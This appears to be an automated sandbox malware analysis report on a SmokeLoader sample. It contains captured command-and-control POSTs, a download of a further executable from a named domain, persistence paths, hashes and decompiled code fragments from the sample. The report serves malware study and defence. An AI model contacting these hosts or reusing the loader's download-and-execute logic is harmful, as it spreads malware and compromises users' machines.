Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49786 | 212.193.50.94 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 28, 2021 05:09:01.200874090 CET | 1974 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://sremv.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 326
            Host: host-data-coin-11.com
Nov 28, 2021 05:09:02.791347980 CET | 1975 | OUT | POST / HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            Accept: */*
            Referer: http://sremv.net/
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Content-Length: 326
            Host: host-data-coin-11.com
Nov 28, 2021 05:09:28.165318012 CET | 11930 | IN | HTTP/1.1 404 Not Found
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:09:04 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c3 55 a1 b9 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49815 | 212.193.50.94 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 28, 2021 05:09:29.425179005 CET | 11930 | OUT | GET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzforyou-7000.com
Nov 28, 2021 05:09:30.934284925 CET | 11931 | OUT | GET /downloads/toolspab2.exe HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: privacytoolzforyou-7000.com
Nov 28, 2021 05:09:35.751183987 CET | 11941 | IN | HTTP/1.1 200 OK
            Server: nginx/1.20.1
            Date: Sun, 28 Nov 2021 04:09:32 GMT
            Content-Type: application/x-msdos-program
            Content-Length: 323584
            Connection: close
            Last-Modified: Sun, 28 Nov 2021 04:09:01 GMT
            ETag: "4f000-5d1d17bf688fe"
            Accept-Ranges: bytes
            Nov 28, 2021 05:09:40.843288898 CET11951INData Raw: 00 29 00 00 00 2e 00 2e 00 2e 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 28 00 70 00 63 00 68 00 2c 00 20 00 70 00 72 00 6f 00 67 00 6e 00 61 00 6d 00 65 00 5f 00 73 00 69 00 7a 00 65 00 20 00 2d 00 20 00 28 00 70 00 63 00 68
            Data Ascii: )...wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)<program name unknown>wcscpy_s(progname, progname_siz
            Nov 28, 2021 05:09:41.578494072 CET11952INData Raw: 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 4c 00 22 00 5f 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f
            Data Ascii: essage, 4096, L"_CrtDbgReport: String too long or IO Error")Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry t
            Nov 28, 2021 05:09:41.625014067 CET11953INData Raw: 6f 6e 20 46 61 69 6c 65 64 00 00 00 00 45 72 72 6f 72 00 00 00 57 61 72 6e 69 6e 67 00 b4 3a 40 00 ac 3a 40 00 98 3a 40 00 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 44 65 62 75 67 20 4c 69 62 72 61 72 79 00 00 5f 43 72 74 44
            Data Ascii: on FailedErrorWarning:@:@:@Microsoft Visual C++ Debug Library_CrtDbgReport: String too long or IO Errorstrcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long


            Code Manipulations

            Statistics

            CPU Usage

            Memory Usage

            High Level Behavior Distribution

            • File
            • Registry

            Behavior

            System Behavior

            Start time:05:07:59
            Start date:28/11/2021
            Path:C:\Users\user\Desktop\cf71PGrIPQ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Start time:05:08:04
            Start date:28/11/2021
            Path:C:\Users\user\Desktop\cf71PGrIPQ.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\cf71PGrIPQ.exe"
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.338557763.00000000004C0000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.338606370.00000000004E1000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low
            Start time:05:08:11
            Start date:28/11/2021
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff720ea0000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000000.327763629.0000000004DE1000.00000020.00020000.sdmp, Author: Joe Security
            Reputation:high
            Start time:05:08:43
            Start date:28/11/2021
            Path:C:\Users\user\AppData\Roaming\iaivaah
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\iaivaah
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Antivirus matches:
            • Detection: 100%, Joe Sandbox ML
            • Detection: 48%, ReversingLabs
            Reputation:low
            Start time:05:08:53
            Start date:28/11/2021
            Path:C:\Users\user\AppData\Roaming\iaivaah
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Roaming\iaivaah
            Imagebase:0x400000
            File size:321024 bytes
            MD5 hash:19B07BFA4BA4CFFBA03DFF47A9EFDF36
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.405322219.0000000000500000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000015.00000002.405829764.0000000002061000.00000004.00020000.sdmp, Author: Joe Security
            Reputation:low

            Disassembly

            Code Analysis

            Executed Functions

            APIs
            • RtlEncodePointer.NTDLL(00000000,?,004185BB,?,?,0041B8E0), ref: 0041B777
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: e420c4da3d51d419ea922ef6abadc655d39b331bad441ee9935cc10d18b2d97d
            • Instruction ID: a2eacf519e8efb819bc7df00a820405c443f1fd92bae8bca4379341c0e9cda8c
            • Opcode Fuzzy Hash: e420c4da3d51d419ea922ef6abadc655d39b331bad441ee9935cc10d18b2d97d
            • Instruction Fuzzy Hash: 70A0223208830CB3E20023C3BE0EF823F8CC3C0B33F000020FB0C028A20EB2A80080AA
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			_entry_() {
            				void* _t3;
            
            				E00417FA0(); // executed
            				return L00417CB0(_t3);
            			}

            APIs
            • ___security_init_cookie.LIBCMTD ref: 00417C95
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp
            Similarity
            • API ID: ___security_init_cookie
            • String ID:
            • API String ID: 3657697845-0
            • Opcode ID: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
            • Instruction ID: 67b28dd7772527adca73a01002058a26748d25af94765fb0c4e5b896dd633d85
            • Opcode Fuzzy Hash: 171c28b58462050255cb6f92a214f913f529165168e82ffd83e58af334052e97
            • Instruction Fuzzy Hash: D7A0023100C64816015033A7144798B756D49C07587E5001AB51C031077C5CB8C240FE
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            C-Code - Quality: 85%
            			E0041FE40(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
            				intOrPtr _v0;
            				void* _v804;
            				intOrPtr _v808;
            				intOrPtr _v812;
            				intOrPtr _t6;
            				intOrPtr _t11;
            				long _t15;
            				intOrPtr _t19;
            				intOrPtr _t20;
            				intOrPtr _t21;
            				intOrPtr _t22;
            				intOrPtr _t23;
            				intOrPtr _t24;
            				intOrPtr _t25;
            				intOrPtr* _t29;
            				void* _t34;
            
            				_t25 = __esi;
            				_t24 = __edi;
            				_t22 = __edx;
            				_t20 = __ecx;
            				_t19 = __ebx;
            				_t6 = __eax;
            				_t34 = _t20 -  *0x432064; // 0x88d1360
            				if(_t34 == 0) {
            					asm("repe ret");
            				}
            				 *0x438988 = _t6;
            				 *0x438984 = _t20;
            				 *0x438980 = _t22;
            				 *0x43897c = _t19;
            				 *0x438978 = _t25;
            				 *0x438974 = _t24;
            				 *0x4389a0 = ss;
            				 *0x438994 = cs;
            				 *0x438970 = ds;
            				 *0x43896c = es;
            				 *0x438968 = fs;
            				 *0x438964 = gs;
            				asm("pushfd");
            				_pop( *0x438998);
            				 *0x43898c =  *_t29;
            				 *0x438990 = _v0;
            				 *0x43899c =  &_a4;
            				 *0x4388d8 = 0x10001;
            				_t11 =  *0x438990; // 0x0
            				 *0x43888c = _t11;
            				 *0x438880 = 0xc0000409;
            				 *0x438884 = 1;
            				_t21 =  *0x432064; // 0x88d1360
            				_v812 = _t21;
            				_t23 =  *0x432068; // 0xf772ec9f
            				_v808 = _t23;
            				 *0x4388d0 = IsDebuggerPresent();
            				_push(1);
            				E0041F290(_t12);
            				SetUnhandledExceptionFilter(0);
            				_t15 = UnhandledExceptionFilter(0x4062ac);
            				if( *0x4388d0 == 0) {
            					_push(1);
            					E0041F290(_t15);
            				}
            				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
            			}

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 004245BD
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004245D4
            • UnhandledExceptionFilter.KERNEL32(004062AC), ref: 004245DF
            • GetCurrentProcess.KERNEL32(C0000409), ref: 004245FD
            • TerminateProcess.KERNEL32(00000000), ref: 00424604
            Memory Dump Source
            • Source File: 00000001.00000002.287056466.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.287053986.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.287076736.0000000000432000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287081282.0000000000437000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.287304740.0000000003211000.00000002.00020000.sdmp
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: 4e9ad5d45d114f15f3d0e9653386f442adb9e8610770dbad0d6162526b55d4e0
            • Instruction ID: fcb50c5d8656b36328d8db7a8de4a4bbdfc6e136a467ae63c883cd56932fa9b3
            • Opcode Fuzzy Hash: 4e9ad5d45d114f15f3d0e9653386f442adb9e8610770dbad0d6162526b55d4e0
            • Instruction Fuzzy Hash: 0121CCB8802308DBD704AF64F945665BBA0BB48314F40207EFA08A2260EBB54685CF4E
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            C-Code - Quality: 46%
            			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
            				intOrPtr _t14;
            				void* _t17;
            				intOrPtr* _t23;
            				void* _t26;
            				void* _t27;
            				void* _t28;
            				signed int _t33;
            				intOrPtr* _t35;
            				void* _t38;
            
            				_t31 = __esi;
            				_t29 = __edi;
            				asm("in eax, 0xe5");
            				 *((short*)(__eax + _t33 * 2)) = __esi;
            				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
            				_push(0x1999);
            				_t14 =  *_t35;
            				__eflags = __al;
            				_t26 = 0x5c;
            				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
            				_t23 =  *((intOrPtr*)(_t33 + 8));
            				Sleep(0x1388);
            				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
            				_t39 = _t17;
            				if(_t17 != 0) {
            					_push( *((intOrPtr*)(_t33 + 0x14)));
            					_push( *((intOrPtr*)(_t33 - 4)));
            					_push(_t17);
            					_push(_t23); // executed
            					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
            				}
            				 *_t23(0xffffffff, 0); // executed
            				_t27 = 0x5c;
            				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
            			}

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID: j\Y
            • API String ID: 417527130-662177190
            • Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
            • Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
            • Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 44%
            			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
            				char _v8;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				intOrPtr _t9;
            				void* _t12;
            				void* _t17;
            				intOrPtr* _t18;
            				void* _t20;
            				void* _t21;
            				void* _t22;
            				void* _t23;
            				void* _t24;
            				intOrPtr* _t25;
            				void* _t27;
            
            				_push(0x1999);
            				_t9 =  *_t25;
            				__eflags = __al;
            				_t20 = 0x5c;
            				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
            				_t18 = _a4;
            				Sleep(0x1388);
            				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
            				_t28 = _t12;
            				if(_t12 != 0) {
            					_push(_a16);
            					_push(_v8);
            					_push(_t12);
            					_push(_t18); // executed
            					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
            				}
            				 *_t18(0xffffffff, 0); // executed
            				_t21 = 0x5c;
            				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
            			}

            APIs
            • Sleep.KERNELBASE(00001388), ref: 004019A1
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessSleepTerminate
            • String ID:
            • API String ID: 417527130-0
            • Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
            • Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
            • Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID: ProcessTerminate
            • String ID:
            • API String ID: 560597551-0
            • Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction ID: 6d9108f025a0daaf84588f91761baf46a4613dd7645499535b00fdf5ce75212c
            • Opcode Fuzzy Hash: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
            • Instruction Fuzzy Hash: 3E21D074609204EAC7156665C863FB637909B41329F60153FE9A3BE2F2C67C4487EB27
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Strings
            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID: (3_\
            • API String ID: 0-1024548672
            • Opcode ID: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
            • Instruction ID: 64c156a0781b3c67ba192cd992c8aad639144a23081a5c252ffbc859459b19b0
            • Opcode Fuzzy Hash: 4a267a5a5f6b649a77e844de47957a3dbb9b510094ac05e3fc21bbb07d5a18e4
            • Instruction Fuzzy Hash: 60113B7911520D6FE33C8A6995A00C2B796FF85608BA1284DD3818FE03C932B493CB80
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
            • Instruction ID: 5be507c2b17a54e2dc63a842639e1fc389e25062d97b9bda01936e9eba1e708e
            • Opcode Fuzzy Hash: adde1d8ed614f1b4627ac8248198af32a96e582f141dfd9e05361ae7fa8ad012
            • Instruction Fuzzy Hash: 0031CE299444499ECB2D4BB0944A1D1BBA0DF5A304BA90DCBCB91BFCD7C974B483C793
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 16%
            			E00402AB3(void* __eax, signed int __ebx, void* __fp0) {
            				signed int _t54;
            				signed char _t65;
            				void* _t66;
            				void* _t70;
            				void* _t71;
            				void* _t73;
            				signed int _t76;
            				void* _t80;
            				signed int _t82;
            				signed int _t84;
            				short _t85;
            				void* _t88;
            				void* _t89;
            				void* _t90;
            				void* _t93;
            				void* _t95;
            				void* _t96;
            				void* _t98;
            				signed int _t105;
            				void* _t107;
            				signed int _t117;
            				signed int _t124;
            				signed int _t125;
            				signed int _t126;
            				signed int _t128;
            				signed int _t129;
            				signed int _t131;
            				signed int _t135;
            				void* _t146;
            				void* _t154;
            
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				_t120 = 0xfeccffcc;
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("lodsd");
            				asm("int3");
            				asm("int3");
            				asm("movsd");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				_t88 = 0x20;
            				asm("repne int3");
            				 *(_t126 + 0x49333330) =  *(_t126 + 0x49333330) ^ 0xb9339adb;
            				asm("sbb eax, 0x67cccccd");
            				_t82 = __ebx |  *0xffcca0cc - 0x00000001;
            				asm("daa");
            				 *0xa9cca4cc =  *0xa9cca4cc - 0xffffffffb9339ada;
            				_t154 = __fp0 -  *((intOrPtr*)(_t82 + 0x78));
            				asm("stosd");
            				asm("cmc");
            				asm("int3");
            				_t110 = 0xffffffffa9cca4cc;
            				asm("enter 0x4fe8, 0x8");
            				asm("enter 0xc927, 0xfe");
            				_t105 = 0xffffffff88220080 *  *0xa9cca4cc >> 0x20;
            				_t54 = 0xb9339adb *  *0xa9cca4cc;
            				_t84 = (_t82 &  *(_t105 + 0x27)) >> 0xd7;
            				_push(0xa9cca4cc);
            				if(_t84 == 0) {
            					asm("int3");
            					asm("int3");
            					asm("int3");
            					asm("daa");
            					_pop(_t131);
            					_t105 = _t54 *  *(_t84 + 0x24b53927) >> 0x20;
            					_t76 = _t54 *  *(_t84 + 0x24b53927);
            					asm("scasb");
            					_t125 = 0xfeccffcc -  *_t84;
            					_t126 = _t131 ^ _t84;
            					_t144 = _t126;
            					asm("sidt [edi+0x680e5429]");
            					if(_t126 > 0) {
            						 *_t76 =  *_t76 + _t76;
            						_pop(_t80);
            						_t76 = E004012AB(_t80, _t84, 0x9a, _t105, 0xffffffffa9cca4cc, _t125, _t144);
            						asm("invalid");
            						asm("int3");
            						asm("int3");
            						asm("pushfd");
            						_t110 = 0xffffffffa9cca4cb ^  *0x310424BB;
            					}
            					_t120 = _t125 ^  *_t84;
            					_t88 = 0x3104241f;
            					asm("int 0xcc");
            				}
            				asm("int3");
            				asm("int3");
            				_t89 = _t88 + 1;
            				_t90 = _t89 - 1;
            				asm("invalid");
            				asm("int3");
            				asm("int3");
            				asm("std");
            				asm("int 0xcc");
            				asm("int3");
            				_t93 = _t90 + 1;
            				asm("cld");
            				asm("int3");
            				asm("int3");
            				asm("pushfd");
            				asm("salc");
            				asm("int 0xcc");
            				asm("int3");
            				_t95 = _t93 - 1 + 1;
            				_pop(_t135);
            				asm("cld");
            				asm("int3");
            				asm("int3");
            				asm("pushfd");
            				_t117 = ((_t110 - 0x00000001 ^  *(_t89 + 0x317d243c) ^  *(_t90 + 0x3e132430)) - 0x00000001 ^  *(_t93 + 0x31462438)) - 0x00000001 ^  *(_t95 + 0x31bf2434);
            				_t124 = _t120 ^  *_t84 ^  *_t84 ^  *_t84 ^  *_t84;
            				_t96 = _t95 - 1;
            				asm("iretd");
            				asm("int 0xcc");
            				asm("int3");
            				asm("daa");
            				asm("fisubr word [0xbaa4bd16]");
            				asm("out 0xcc, eax");
            				asm("int3");
            				_t118 = _t117 + 1;
            				asm("enter 0x4fe8, 0x8");
            				asm("enter 0xc927, 0xb2");
            				 *(_t117 + 1) =  *(_t117 + 1) ^ _t135;
            				asm("in al, dx");
            				asm("movsb");
            				asm("int3");
            				asm("int3");
            				asm("int3");
            				asm("daa");
            				_t128 = _t124;
            				asm("sbb eax, 0xe23827fb");
            				_t65 = _t126 & 0x00000057;
            				_t107 = (_t105 &  *(_t96 - 0x7af53ed9)) -  *_t84;
            				_t129 = _t128 ^ _t84;
            				_t85 =  *0x68ecd704;
            				_t146 = _t96 -  *((intOrPtr*)(_t65 + _t65));
            				 *((intOrPtr*)(_t65 - 0x15)) =  *((intOrPtr*)(_t65 - 0x15)) + _t85;
            				_t66 = _t65 + 0xf4eb2485;
            				asm("in al, dx");
            				E004012AB(_t66, _t85, 0xab, _t107, _t118, _t124, _t146);
            				_push( *((intOrPtr*)(_t129 - 4)));
            				L004019FC(_t107, _t118, _t124, _t146); // executed
            				_push(_t85 + 0x3098);
            				_push( *((intOrPtr*)(_t129 - 4)));
            				_t70 = E00402601(_t107, _t146); // executed
            				_t147 = _t70;
            				if(_t70 != 0) {
            					_t71 = E00401F45(_t85, _t107, _t118, _t124, _t147,  *((intOrPtr*)(_t129 - 4)));
            					_t148 = _t71;
            					if(_t71 != 0) {
            						L18:
            						_t152 = gs;
            						if(gs != 0) {
            							_t73 = _t85 + 0x537c;
            							_t98 = 0x2e0e;
            						} else {
            							_t73 = _t85 + 0x30d8;
            							_t98 = 0x22a4;
            						}
            						E00401962(_t98, _t154,  *((intOrPtr*)(_t129 - 4)), _t73, _t98,  *((intOrPtr*)(_t85 + 0x818a))); // executed
            						_t70 = E004012AB(0x2c3a, _t85, 0xab, _t107, _t118, _t124, _t152);
            					} else {
            						_push( *((intOrPtr*)(_t129 - 4)));
            						_t70 = L00402269(_t85, _t118, _t124, _t148); // executed
            						_t149 = _t70;
            						if(_t70 != 0) {
            							_push( *((intOrPtr*)(_t129 - 4)));
            							_t70 = L00402339(_t85, _t107, _t118, _t124, _t149); // executed
            							_t150 = _t70;
            							if(_t70 != 0) {
            								_push( *((intOrPtr*)(_t129 - 4)));
            								_t70 = E00402000(_t85, _t118, _t124, _t150, _t154); // executed
            								if(_t70 != 0) {
            									goto L18;
            								}
            							}
            						}
            					}
            				}
            				return _t70;
            			}

































            Disassembly addresses: 0x00402ab8 to 0x00402ce6

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
            • Instruction ID: ee94f92266ba9be288bfed2233454c816de7546f4ab939652c09e43866b9b785
            • Opcode Fuzzy Hash: cf526be089bbf4f567823773968cea02f6975f775f586de3c71f4e573fc0c6e7
            • Instruction Fuzzy Hash: 63317A2991085D9BCB2D4B75905C191B7A4DF5E308FB60D8ACB91BFD97CA34B843C293
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
            • Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000001.286880592.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction ID: abc276a2ba0a36a85ab5b5df61cf416fa3bc2d73c79843c5fd07df71a10c5fed
            • Opcode Fuzzy Hash: 79ea8fd425b2c888051b2e809439338920840858330f0444cb6eb141cff5550f
            • Instruction Fuzzy Hash: 3A012B7400430CBED2289660D589453BBA8FBC1344F601D2EC3423BCE2C979B857D697
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
            • Instruction ID: 0d435e3da4236d765e4c301cf304dd2dd2fe2570b998ddab2789a7de4284b15f
            • Opcode Fuzzy Hash: 36c7c2ea362ab175c8faec48889e7f9c448137358fc225cecc8bd01fb5f49981
            • Instruction Fuzzy Hash: 1001A27800265CAB972DCAA5D5D9041FFA9EE06330FA8EC8DC7824FD42CEB57086C643
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
            • Instruction ID: 7ec0170f8d63d1cb41ea52610257a3a2e440b84d0ce0a50aa0c143b35ceb2a17
            • Opcode Fuzzy Hash: 50abe3c5d8af24f71ceee97d10064826831867a7979f46442cde13a65a6779ae
            • Instruction Fuzzy Hash: 26F0C87410020D6ED22CD7A0D185052B7A4FFC1304F611D5DC3422BCA2C939B853DA83
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000006.00000002.338362649.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • API ID:
